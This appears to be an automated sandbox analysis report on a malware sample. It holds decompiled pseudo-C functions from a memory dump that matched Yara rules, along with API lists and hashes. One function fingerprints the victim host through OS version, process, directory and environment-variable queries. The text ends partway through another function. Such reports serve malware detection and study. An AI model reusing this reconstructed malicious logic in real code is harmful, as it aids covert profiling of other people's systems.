                                    			E000CA3ED(signed int __ecx, intOrPtr* __edx, void* __fp0) {
                                    				intOrPtr _v8;
                                    				signed int _v16;
                                    				char _v20;
                                    				void* _t24;
                                    				char _t25;
                                    				signed int _t30;
                                    				intOrPtr* _t45;
                                    				signed int _t46;
                                    				void* _t47;
                                    				void* _t54;
                                    
                                    				_t54 = __fp0;
                                    				_t45 = __edx;
                                    				_t46 = 0;
                                    				_t30 = __ecx;
                                    				if( *__edx > 0) {
                                    					do {
                                    						_t24 = E000C9ED0(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8))); // executed
                                    						if(_t24 == 0) {
                                    							_t25 = E000C9749( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8)));
                                    							_v8 = _t25;
                                    							if(_t25 != 0) {
                                    								L6:
                                    								_v16 = _v16 & 0x00000000;
                                    								_v20 = _t25;
                                    								E000CA0AB(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8)), _t54,  &_v20, 8, 2); // executed
                                    								_t47 = _t47 + 0xc;
                                    							} else {
                                    								if(GetLastError() != 0xd) {
                                    									_t25 = _v8;
                                    									goto L6;
                                    								} else {
                                    									E000C9F48( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8))); // executed
                                    								}
                                    							}
                                    						}
                                    						_t46 = _t46 + 1;
                                    					} while (_t46 <  *_t45);
                                    				}
                                    				return 0;
                                    			}














                                    APIs
                                      • Part of subcall function 000C9749: SetLastError.KERNEL32(0000000D,00000000,00000000,000CA341,00000000,00000000,?,?,?,000C5AE1), ref: 000C9782
                                    • GetLastError.KERNEL32(00000000,?,00000000,?,?,?,?,000C4C60,?,?,00000000), ref: 000CA424
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast
                                    • String ID:
                                    • API String ID: 1452528299-0
                                    • Opcode ID: b57cf1d61cdb095835d73ad5a8e6bc193129740f7953490e1dc8bc682e72e34b
                                    • Instruction ID: d7e6118cc00964f766b737b52ca09863481d2aae4fe2f29f29cc8711e36414d7
                                    • Opcode Fuzzy Hash: b57cf1d61cdb095835d73ad5a8e6bc193129740f7953490e1dc8bc682e72e34b
                                    • Instruction Fuzzy Hash: 71116175B0010AABCB14DF59C489F9EF3AAFB85719F20816DD80197242DB70ED05CBD1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 95%
                                    			E000C5D7D(void* __eflags) {
                                    				char _v44;
                                    				intOrPtr _t7;
                                    				intOrPtr _t10;
                                    				void* _t11;
                                    				WCHAR* _t12;
                                    				WCHAR* _t13;
                                    				WCHAR* _t14;
                                    				intOrPtr _t15;
                                    				intOrPtr _t19;
                                    				intOrPtr _t22;
                                    				void* _t27;
                                    				WCHAR* _t28;
                                    
                                    				_t7 =  *0xde688; // 0xf0000
                                    				E000CA86D( &_v44,  *((intOrPtr*)(_t7 + 0xac)) + 4, __eflags);
                                    				_t10 =  *0xde684; // 0x27bf8f0
                                    				_t28 = 2;
                                    				_t11 =  *((intOrPtr*)(_t10 + 0xbc))(_t28, 0,  &_v44, _t27);
                                    				if(_t11 == 0) {
                                    					_t22 =  *0xde688; // 0xf0000
                                    					_t12 = E000C5974( *((intOrPtr*)(_t22 + 0xac)), 0, __eflags); // executed
                                    					 *0xde6ac = _t12;
                                    					__eflags = _t12;
                                    					if(_t12 != 0) {
                                    						_t14 = E000C9EBB();
                                    						__eflags = _t14;
                                    						if(_t14 == 0) {
                                    							_t28 = 0;
                                    							__eflags = 0;
                                    						} else {
                                    							_t15 =  *0xde688; // 0xf0000
                                    							lstrcmpiW(_t15 + 0x228, _t14);
                                    							asm("sbb esi, esi");
                                    							_t28 = _t28 + 1;
                                    						}
                                    					}
                                    					_t13 = _t28;
                                    				} else {
                                    					_t19 =  *0xde684; // 0x27bf8f0
                                    					 *((intOrPtr*)(_t19 + 0x30))(_t11);
                                    					_t13 = 3;
                                    				}
                                    				return _t13;
                                    			}
















                                    APIs
                                    • lstrcmpiW.KERNEL32(000EFDD8,00000000), ref: 000C5DF2
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcmpi
                                    • String ID:
                                    • API String ID: 1586166983-0
                                    • Opcode ID: b5c5492bde0fcbd79c8d76813e54915602f39492791b3c08382e59e2492a186d
                                    • Instruction ID: 103ad920e2b6f5a977f8ee732e07f157b635f09cc7f745bb5b42d842e6e571db
                                    • Opcode Fuzzy Hash: b5c5492bde0fcbd79c8d76813e54915602f39492791b3c08382e59e2492a186d
                                    • Instruction Fuzzy Hash: 7201B1312026119FF754EBA9DC89F9E33E8DB58341F054029F902DF1E2DA60E840C7B1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E000CBA05() {
                                    				signed int _v8;
                                    				signed int _v12;
                                    				intOrPtr _t15;
                                    				void* _t16;
                                    				void* _t18;
                                    				void* _t21;
                                    				intOrPtr _t22;
                                    				void* _t24;
                                    				void* _t30;
                                    
                                    				_v8 = _v8 & 0x00000000;
                                    				_t15 =  *0xde68c; // 0x27bfab8
                                    				_t16 =  *((intOrPtr*)(_t15 + 0x70))(_t24, 8,  &_v8, _t24, _t24);
                                    				if(_t16 != 0) {
                                    					_v12 = _v12 & 0x00000000;
                                    					_t18 = E000CB998(1,  &_v12); // executed
                                    					_t30 = _t18;
                                    					if(_t30 != 0) {
                                    						CloseHandle(_v8);
                                    						_t21 = _t30;
                                    					} else {
                                    						if(_v8 != _t18) {
                                    							_t22 =  *0xde684; // 0x27bf8f0
                                    							 *((intOrPtr*)(_t22 + 0x30))(_v8);
                                    						}
                                    						_t21 = 0;
                                    					}
                                    					return _t21;
                                    				} else {
                                    					return _t16;
                                    				}
                                    			}













                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6c71d26ea1c7d67146cd9b950da2090079754ff8c0595719dac4e2876920f872
                                    • Instruction ID: 1444dde37cf9ff6e32baa45f932119c6418e42d8efec47e869b3358f31e80b18
                                    • Opcode Fuzzy Hash: 6c71d26ea1c7d67146cd9b950da2090079754ff8c0595719dac4e2876920f872
                                    • Instruction Fuzzy Hash: A2F06931A10208EFDF60EBA0C986FAE77F8EB04399F1140A9B441EB151DB74DE009B61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E000C5CEC(void* __ecx, void* __eflags, void* __fp0) {
                                    				void _v44;
                                    				signed int _t8;
                                    				intOrPtr _t14;
                                    				intOrPtr _t15;
                                    				intOrPtr _t21;
                                    				void* _t24;
                                    				void* _t29;
                                    				void* _t35;
                                    
                                    				_t35 = __eflags;
                                    				_t24 = __ecx;
                                    				_t8 =  *0xde688; // 0xf0000
                                    				E000D249B(_t8,  *((intOrPtr*)(_t8 + 0x224))); // executed
                                    				E000C85EF();
                                    				E000C8F78();
                                    				 *0xde780 = 0;
                                    				 *0xde784 = 0;
                                    				 *0xde77c = 0;
                                    				E000C5EB6(); // executed
                                    				E000CCF84(_t24);
                                    				_t14 =  *0xde688; // 0xf0000
                                    				 *((intOrPtr*)(_t14 + 0xa4)) = 2;
                                    				_t15 =  *0xde688; // 0xf0000
                                    				E000CA86D( &_v44,  *((intOrPtr*)(_t15 + 0xac)) + 7, _t35);
                                    				E000CB337( &_v44);
                                    				memset( &_v44, 0, 0x27);
                                    				E000C5C26( &_v44, __fp0);
                                    				_t21 =  *0xde684; // 0x27bf8f0
                                    				 *((intOrPtr*)(_t21 + 0xdc))(0, _t29);
                                    				return 0;
                                    			}












                                    APIs
                                      • Part of subcall function 000C85EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,000C5FA7), ref: 000C85F8
                                      • Part of subcall function 000CCF84: GetCurrentProcess.KERNEL32(?,?,000F0000,?,000C3545), ref: 000CCF90
                                      • Part of subcall function 000CCF84: GetModuleFileNameW.KERNEL32(00000000,000F1644,00000105,?,?,000F0000,?,000C3545), ref: 000CCFB1
                                      • Part of subcall function 000CCF84: memset.MSVCRT ref: 000CCFE2
                                      • Part of subcall function 000CCF84: GetVersionExA.KERNEL32(000F0000,000F0000,?,000C3545), ref: 000CCFED
                                      • Part of subcall function 000CCF84: GetCurrentProcessId.KERNEL32(?,000C3545), ref: 000CCFF3
                                      • Part of subcall function 000CB337: CloseHandle.KERNELBASE(00000000,?,00000000,000C3C8A,?,?,?,?,?,?,?,?,000C3D6F,00000000), ref: 000CB36A
                                    • memset.MSVCRT ref: 000C5D5F
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: CurrentProcessmemset$CloseCreateFileHandleHeapModuleNameVersion
                                    • String ID:
                                    • API String ID: 4245722550-0
                                    • Opcode ID: fa89a80829d7a9760737cc4274533f209aa92eb7a2269d63f0a7b72384ce7043
                                    • Instruction ID: af213eb193222f81b8a95cd20b2ee53c4ca132bbc1b9434b2fcea704800a8989
                                    • Opcode Fuzzy Hash: fa89a80829d7a9760737cc4274533f209aa92eb7a2269d63f0a7b72384ce7043
                                    • Instruction Fuzzy Hash: 78011D715022549FF600FBA8DC8AEDD3BE4EF29350F45006AF8049B263DB74A545CBB6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E000C861A(int _a4, intOrPtr _a8) {
                                    				int _t3;
                                    				intOrPtr _t4;
                                    				void* _t9;
                                    
                                    				_t3 = _a4;
                                    				if(_t3 == 0) {
                                    					return _t3;
                                    				}
                                    				_t9 =  *_t3;
                                    				if(_t9 != 0) {
                                    					 *_t3 =  *_t3 & 0x00000000;
                                    					_t4 = _a8;
                                    					if(_t4 != 0xffffffff) {
                                    						if(_t4 == 0xfffffffe) {
                                    							_t4 = E000CC392(_t9);
                                    						}
                                    					} else {
                                    						_t4 = E000CC379(_t9);
                                    					}
                                    					E000C874F(_t9, 0, _t4);
                                    					_t3 = HeapFree( *0xde768, 0, _t9); // executed
                                    				}
                                    				return _t3;
                                    			}







                                    APIs
                                    • HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000C8660
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: FreeHeap
                                    • String ID:
                                    • API String ID: 3298025750-0
                                    • Opcode ID: 29d119adc27ebfcbbca3d09bb5a218d10cee232c1cd15d8c43ca6c796faa6935
                                    • Instruction ID: bdf107fd91a53e23c3bc046cb1b94fcf4e343da30d7e73e1e878ef7509521b23
                                    • Opcode Fuzzy Hash: 29d119adc27ebfcbbca3d09bb5a218d10cee232c1cd15d8c43ca6c796faa6935
                                    • Instruction Fuzzy Hash: 94F0A031502624AFEA616B24EC01FAE37889F02B30F24C209F818AA1E1DF309D0087ED
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E000CA77D(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                                    				signed int _t5;
                                    				void* _t6;
                                    				void* _t10;
                                    				long _t15;
                                    				void* _t17;
                                    
                                    				_t15 = 2;
                                    				_t5 = E000CA5F7(_a4, _t15);
                                    				_t17 = _t5;
                                    				if(_t17 != 0) {
                                    					_t6 = E000CA65C(_t17, _a8, _a12); // executed
                                    					if(_t6 != 0) {
                                    						CloseHandle(_t17);
                                    						return 0;
                                    					}
                                    					_t10 = 0xfffffffe;
                                    					return _t10;
                                    				}
                                    				return _t5 | 0xffffffff;
                                    			}









                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: 2e382b22e81275347063f2f55ddbba12819f7fbba9436c0590232eb544ecab76
                                    • Instruction ID: 530dcad075266c1156e77377669d94ddcef453a396c3f42a45d0ff379d1e2d4c
                                    • Opcode Fuzzy Hash: 2e382b22e81275347063f2f55ddbba12819f7fbba9436c0590232eb544ecab76
                                    • Instruction Fuzzy Hash: 55E09B3530861D6B8B2157A8AC50E9E3765AF4A77C7114716FD258F2D1CA30D84042D2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E000C98A6(void* __eflags, intOrPtr _a4) {
                                    				intOrPtr _t24;
                                    
                                    				_t24 = _a4;
                                    				if(E000CA4BF( *(_t24 + 0x1c), 0x3a98) >= 0) {
                                    					CloseHandle( *(_t24 + 0x1c));
                                    					 *((intOrPtr*)(_t24 + 0x18)) =  *((intOrPtr*)(_t24 + 8))( *((intOrPtr*)(_t24 + 0xc)));
                                    					if(( *(_t24 + 0x14) & 0x00000001) == 0) {
                                    						E000C984A(_t24, 1);
                                    					}
                                    					return  *((intOrPtr*)(_t24 + 0x18));
                                    				}
                                    				return 0;
                                    			}





                                    APIs
                                    • CloseHandle.KERNELBASE(?), ref: 000C98CA
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle
                                    • String ID:
                                    • API String ID: 2962429428-0
                                    • Opcode ID: 3630957e612100f342e4842c6b5e58546f75cb5bc4260129e5d56011a5f31b81
                                    • Instruction ID: 761c44297c6940bc27b2f576ce9d72b8e9fb3a67907d93a40376c24e364c2c1d
                                    • Opcode Fuzzy Hash: 3630957e612100f342e4842c6b5e58546f75cb5bc4260129e5d56011a5f31b81
                                    • Instruction Fuzzy Hash: E0F0A030300B009BC720AF22E848E5BBBE9EF56350700882DE986879A2DB35F8099790
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 89%
                                    			E000CB337(void* __ecx) {
                                    				intOrPtr _t4;
                                    				void* _t5;
                                    				intOrPtr _t6;
                                    				void* _t12;
                                    				void* _t13;
                                    
                                    				_t4 =  *0xde684; // 0x27bf8f0
                                    				_t13 = 0;
                                    				_t5 =  *((intOrPtr*)(_t4 + 0xbc))(2, 0, __ecx);
                                    				_t12 = _t5;
                                    				if(_t12 != 0) {
                                    					_t6 =  *0xde684; // 0x27bf8f0
                                    					_push(_t12);
                                    					if( *((intOrPtr*)(_t6 + 0xc0))() != 0) {
                                    						_t13 = 1;
                                    					}
                                    					CloseHandle(_t12);
                                    					return _t13;
                                    				}
                                    				return _t5;
                                    			}








                                    APIs
                                    • CloseHandle.KERNELBASE(00000000,?,00000000,000C3C8A,?,?,?,?,?,?,?,?,000C3D6F,00000000), ref: 000CB36A
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle
                                    • String ID:
                                    • API String ID: 2962429428-0
                                    • Opcode ID: 34c13cd0fe4e9c133c3b9b320e777d7b51e1db3172c1e3d0fe4fb5bf720220e4
                                    • Instruction ID: 952f55d8802c1bf5a37f67cca09105c85e7c47fe1d2e413aeb41e2f7cc7b4704
                                    • Opcode Fuzzy Hash: 34c13cd0fe4e9c133c3b9b320e777d7b51e1db3172c1e3d0fe4fb5bf720220e4
                                    • Instruction Fuzzy Hash: B2E04F32301160ABD6606B69EC8CF6B7BA9FB99A91F06016DF905CB151CB24C802C7B1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    C-Code - Quality: 86%
                                    			E000CD01F(void* __fp0) {
                                    				char _v8;
                                    				char _v12;
                                    				char _v16;
                                    				struct _SYSTEM_INFO _v52;
                                    				char _v180;
                                    				char _v692;
                                    				char _v704;
                                    				char _v2680;
                                    				void* __esi;
                                    				struct _OSVERSIONINFOA* _t81;
                                    				intOrPtr _t83;
                                    				void* _t84;
                                    				long _t86;
                                    				intOrPtr* _t88;
                                    				intOrPtr _t90;
                                    				intOrPtr _t95;
                                    				intOrPtr _t97;
                                    				void* _t98;
                                    				intOrPtr _t103;
                                    				char* _t105;
                                    				void* _t108;
                                    				char _t115;
                                    				signed int _t117;
                                    				char _t119;
                                    				intOrPtr _t124;
                                    				intOrPtr _t127;
                                    				intOrPtr _t130;
                                    				intOrPtr _t134;
                                    				intOrPtr _t147;
                                    				intOrPtr _t149;
                                    				intOrPtr _t152;
                                    				intOrPtr _t154;
                                    				signed int _t159;
                                    				struct HINSTANCE__* _t162;
                                    				short* _t164;
                                    				intOrPtr _t167;
                                    				WCHAR* _t168;
                                    				char* _t169;
                                    				intOrPtr _t181;
                                    				intOrPtr _t200;
                                    				void* _t215;
                                    				char _t218;
                                    				void* _t219;
                                    				char* _t220;
                                    				struct _OSVERSIONINFOA* _t222;
                                    				void* _t223;
                                    				int* _t224;
                                    				void* _t241;
                                    
                                    				_t241 = __fp0;
                                    				_t162 =  *0xde69c; // 0x10000000
                                    				_t81 = E000C8604(0x1ac4);
                                    				_t222 = _t81;
                                    				if(_t222 == 0) {
                                    					return _t81;
                                    				}
                                    				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
                                    				_t83 =  *0xde684; // 0x27bf8f0
                                    				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
                                    				_t3 = _t222 + 0x648; // 0x648
                                    				E000D2301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
                                    				_t5 = _t222 + 0x1644; // 0x1644
                                    				_t216 = _t5;
                                    				_t86 = GetModuleFileNameW(0, _t5, 0x105);
                                    				_t227 = _t86;
                                    				if(_t86 != 0) {
                                    					 *((intOrPtr*)(_t222 + 0x1854)) = E000C8FBE(_t216, _t227);
                                    				}
                                    				GetCurrentProcess();
                                    				_t88 = E000CBA05();
                                    				 *((intOrPtr*)(_t222 + 0x110)) = _t88;
                                    				_t178 =  *_t88;
                                    				if(E000CBB8D( *_t88) == 0) {
                                    					_t90 = E000CBA62(_t178, _t222);
                                    					__eflags = _t90;
                                    					_t181 = (0 | _t90 > 0x00000000) + 1;
                                    					__eflags = _t181;
                                    					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
                                    				} else {
                                    					 *((intOrPtr*)(_t222 + 0x214)) = 3;
                                    				}
                                    				_t12 = _t222 + 0x220; // 0x220
                                    				 *((intOrPtr*)(_t222 + 0x218)) = E000CE3F1(_t12);
                                    				 *((intOrPtr*)(_t222 + 0x21c)) = E000CE3B6(_t12);
                                    				_push( &_v16);
                                    				 *(_t222 + 0x224) = _t162;
                                    				_push( &_v8);
                                    				_v12 = 0x80;
                                    				_push( &_v692);
                                    				_v8 = 0x100;
                                    				_push( &_v12);
                                    				_t22 = _t222 + 0x114; // 0x114
                                    				_push( *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x110)))));
                                    				_t95 =  *0xde68c; // 0x27bfab8
                                    				_push(0);
                                    				if( *((intOrPtr*)(_t95 + 0x6c))() == 0) {
                                    					GetLastError();
                                    				}
                                    				_t97 =  *0xde694; // 0x27bfa48
                                    				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
                                    				_t26 = _t222 + 0x228; // 0x228
                                    				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
                                    				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
                                    				GetLastError();
                                    				_t31 = _t222 + 0x228; // 0x228
                                    				 *((intOrPtr*)(_t222 + 0x434)) = E000C8FBE(_t31, _t98);
                                    				_t34 = _t222 + 0x114; // 0x114
                                    				_t103 = E000CB7A8(_t34,  &_v692);
                                    				_t35 = _t222 + 0xb0; // 0xb0
                                    				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
                                    				_push(_t35);
                                    				E000CB67D(_t103, _t35, _t98, _t241);
                                    				_t37 = _t222 + 0xb0; // 0xb0
                                    				_t105 = _t37;
                                    				_t38 = _t222 + 0xd0; // 0xd0
                                    				_t164 = _t38;
                                    				if(_t105 != 0) {
                                    					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
                                    					if(_t159 > 0) {
                                    						_t164[_t159] = 0;
                                    					}
                                    				}
                                    				_t41 = _t222 + 0x438; // 0x438
                                    				_t42 = _t222 + 0x228; // 0x228
                                    				E000C8FD8(_t42, _t41);
                                    				_t43 = _t222 + 0xb0; // 0xb0
                                    				_t108 = E000CD400(_t43, E000CC379(_t43), 0);
                                    				_t44 = _t222 + 0x100c; // 0x100c
                                    				E000CB88A(_t108, _t44, _t241);
                                    				_t199 = GetCurrentProcess();
                                    				 *((intOrPtr*)(_t222 + 0x101c)) = E000CBBDF(_t110);
                                    				memset(_t222, 0, 0x9c);
                                    				_t224 = _t223 + 0xc;
                                    				_t222->dwOSVersionInfoSize = 0x9c;
                                    				GetVersionExA(_t222);
                                    				_t167 =  *0xde684; // 0x27bf8f0
                                    				_t115 = 0;
                                    				_v8 = 0;
                                    				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
                                    					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
                                    					_t115 = _v8;
                                    				}
                                    				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
                                    				if(_t115 == 0) {
                                    					GetSystemInfo( &_v52);
                                    					_t117 = _v52.dwOemId & 0x0000ffff;
                                    				} else {
                                    					_t117 = 9;
                                    				}
                                    				_t54 = _t222 + 0x1020; // 0x1020
                                    				_t168 = _t54;
                                    				 *(_t222 + 0x9c) = _t117;
                                    				GetWindowsDirectoryW(_t168, 0x104);
                                    				_t119 = E000C95E1(_t199, 0x10c);
                                    				_t200 =  *0xde684; // 0x27bf8f0
                                    				_t218 = _t119;
                                    				 *_t224 = 0x104;
                                    				_push( &_v704);
                                    				_push(_t218);
                                    				_v8 = _t218;
                                    				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
                                    					_t154 =  *0xde684; // 0x27bf8f0
                                    					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
                                    				}
                                    				E000C85D5( &_v8);
                                    				_t124 =  *0xde684; // 0x27bf8f0
                                    				_t61 = _t222 + 0x1434; // 0x1434
                                    				_t219 = _t61;
                                    				 *_t224 = 0x209;
                                    				_push(_t219);
                                    				_push(L"USERPROFILE");
                                    				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
                                    					E000C9640(_t219, 0x105, L"%s\\%s", _t168);
                                    					_t152 =  *0xde684; // 0x27bf8f0
                                    					_t224 =  &(_t224[5]);
                                    					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
                                    				}
                                    				_push(0x20a);
                                    				_t64 = _t222 + 0x122a; // 0x122a
                                    				_t169 = L"TEMP";
                                    				_t127 =  *0xde684; // 0x27bf8f0
                                    				_push(_t169);
                                    				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
                                    					_t149 =  *0xde684; // 0x27bf8f0
                                    					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
                                    				}
                                    				_push(0x40);
                                    				_t220 = L"SystemDrive";
                                    				_push( &_v180);
                                    				_t130 =  *0xde684; // 0x27bf8f0
                                    				_push(_t220);
                                    				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
                                    					_t147 =  *0xde684; // 0x27bf8f0
                                    					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
                                    				}
                                    				_v8 = 0x7f;
                                    				_t72 = _t222 + 0x199c; // 0x199c
                                    				_t134 =  *0xde684; // 0x27bf8f0
                                    				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
                                    				_t75 = _t222 + 0x100c; // 0x100c
                                    				E000D2301(E000CD400(_t75, E000CC379(_t75), 0),  &_v2680);
                                    				_t76 = _t222 + 0x1858; // 0x1858
                                    				E000D22D3( &_v2680, _t76, 0x20);
                                    				_t79 = _t222 + 0x1878; // 0x1878
                                    				E000C902D(1, _t79, 0x14, 0x1e,  &_v2680);
                                    				 *((intOrPtr*)(_t222 + 0x1898)) = E000CCD33(_t79);
                                    				return _t222;
                                    			}



















































                                    APIs
                                      • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
                                    • GetCurrentProcessId.KERNEL32 ref: 000CD046
                                    • GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 000CD082
                                    • GetCurrentProcess.KERNEL32 ref: 000CD09F
                                    • GetLastError.KERNEL32 ref: 000CD13E
                                    • GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 000CD16C
                                    • GetLastError.KERNEL32 ref: 000CD172
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 000CD1C7
                                    • GetCurrentProcess.KERNEL32 ref: 000CD20E
                                    • memset.MSVCRT ref: 000CD229
                                    • GetVersionExA.KERNEL32(00000000), ref: 000CD234
                                    • GetCurrentProcess.KERNEL32(00000100), ref: 000CD24E
                                    • GetSystemInfo.KERNEL32(?), ref: 000CD26A
                                    • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 000CD287
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: CurrentProcess$ErrorFileLastModuleName$AllocateByteCharDirectoryHeapInfoMultiSystemVersionWideWindowsmemset
                                    • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                                    • API String ID: 3876402152-2706916422
                                    • Opcode ID: 37bcc01c9bc94b24e7331b634080c8e5ad094a8be6c0a042994241c4e1bd66b4
                                    • Instruction ID: bb5fc8c38e6f26cdcc8b067c3c65418d8cefabbea5c8d39083ed8debe4d40b99
                                    • Opcode Fuzzy Hash: 37bcc01c9bc94b24e7331b634080c8e5ad094a8be6c0a042994241c4e1bd66b4
                                    • Instruction Fuzzy Hash: A1B14C71600744ABE710EB74DD89FEE77E8EF58340F00446EF95AD7292EB74AA448B21
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 50%
                                    			E000CDB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
                                    				signed int _v12;
                                    				signed int _v16;
                                    				signed int _v20;
                                    				char _v24;
                                    				void* _v28;
                                    				signed int _v32;
                                    				char _v36;
                                    				intOrPtr _v40;
                                    				signed int _v44;
                                    				char _v48;
                                    				char _v52;
                                    				intOrPtr _v56;
                                    				signed int _v60;
                                    				char* _v72;
                                    				signed short _v80;
                                    				signed int _v84;
                                    				char _v88;
                                    				char _v92;
                                    				char _v96;
                                    				intOrPtr _v100;
                                    				char _v104;
                                    				char _v616;
                                    				intOrPtr* _t159;
                                    				char _t165;
                                    				signed int _t166;
                                    				signed int _t173;
                                    				signed int _t178;
                                    				signed int _t186;
                                    				intOrPtr* _t187;
                                    				signed int _t188;
                                    				signed int _t192;
                                    				intOrPtr* _t193;
                                    				intOrPtr _t200;
                                    				intOrPtr* _t205;
                                    				signed int _t207;
                                    				signed int _t209;
                                    				intOrPtr* _t210;
                                    				intOrPtr _t212;
                                    				intOrPtr* _t213;
                                    				signed int _t214;
                                    				char _t217;
                                    				signed int _t218;
                                    				signed int _t219;
                                    				signed int _t230;
                                    				signed int _t235;
                                    				signed int _t242;
                                    				signed int _t243;
                                    				signed int _t244;
                                    				signed int _t245;
                                    				intOrPtr* _t247;
                                    				intOrPtr* _t251;
                                    				signed int _t252;
                                    				intOrPtr* _t253;
                                    				void* _t255;
                                    				intOrPtr* _t261;
                                    				signed int _t262;
                                    				signed int _t283;
                                    				signed int _t289;
                                    				char* _t298;
                                    				void* _t320;
                                    				signed int _t322;
                                    				intOrPtr* _t323;
                                    				intOrPtr _t324;
                                    				signed int _t327;
                                    				intOrPtr* _t328;
                                    				intOrPtr* _t329;
                                    
                                    				_v32 = _v32 & 0x00000000;
                                    				_v60 = _v60 & 0x00000000;
                                    				_v56 = __edx;
                                    				_v100 = __ecx;
                                    				_t159 = E000CD523(__ecx);
                                    				_t251 = _t159;
                                    				_v104 = _t251;
                                    				if(_t251 == 0) {
                                    					return _t159;
                                    				}
                                    				_t320 = E000C8604(0x10);
                                    				_v36 = _t320;
                                    				_pop(_t255);
                                    				if(_t320 == 0) {
                                    					L53:
                                    					E000C861A( &_v60, 0xfffffffe);
                                    					E000CD5D7( &_v104);
                                    					return _t320;
                                    				}
                                    				_t165 = E000C95E1(_t255, 0x536);
                                    				 *_t328 = 0x609;
                                    				_v52 = _t165;
                                    				_t166 = E000C95E1(_t255);
                                    				_push(0);
                                    				_push(_v56);
                                    				_v20 = _t166;
                                    				_push(_t166);
                                    				_push(_a4);
                                    				_t322 = E000C92E5(_t165);
                                    				_v60 = _t322;
                                    				E000C85D5( &_v52);
                                    				E000C85D5( &_v20);
                                    				_t329 = _t328 + 0x20;
                                    				if(_t322 != 0) {
                                    					_t323 = __imp__#2;
                                    					_v40 =  *_t323(_t322);
                                    					_t173 = E000C95E1(_t255, 0x9e4);
                                    					_v20 = _t173;
                                    					_v52 =  *_t323(_t173);
                                    					E000C85D5( &_v20);
                                    					_t324 = _v40;
                                    					_t261 =  *_t251;
